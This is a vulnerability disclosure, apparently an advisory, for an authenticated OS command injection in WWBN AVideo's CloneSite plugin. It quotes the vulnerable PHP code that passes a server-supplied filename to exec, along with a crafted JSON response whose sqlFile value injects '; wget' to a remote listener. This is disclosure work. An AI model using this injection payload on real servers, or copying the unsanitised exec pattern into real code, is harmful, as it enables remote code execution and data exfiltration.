$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}jmrcsnchz Finder
WWBN Avideo Authenticated RCE - OS Command Injection
Description
An OS Command Injection vulnerability in an Authenticated endpoint
/plugin/CloneSite/cloneClient.json.phpallows attackers to achieve Remote Code Execution.Vulnerable code:
We can control
$objClone->cloneSiteURLthrough the admin panel clone site feature./plugin/CloneSite/cloneClient.json.phpsends a GET Request to{$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. I hosted a specially craftedcloneServer.json.phpthat prints the following JSON data{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}Send a GET Request to
/plugin/CloneSite/cloneClient.json.phpthen remote code execution is achieved.Credits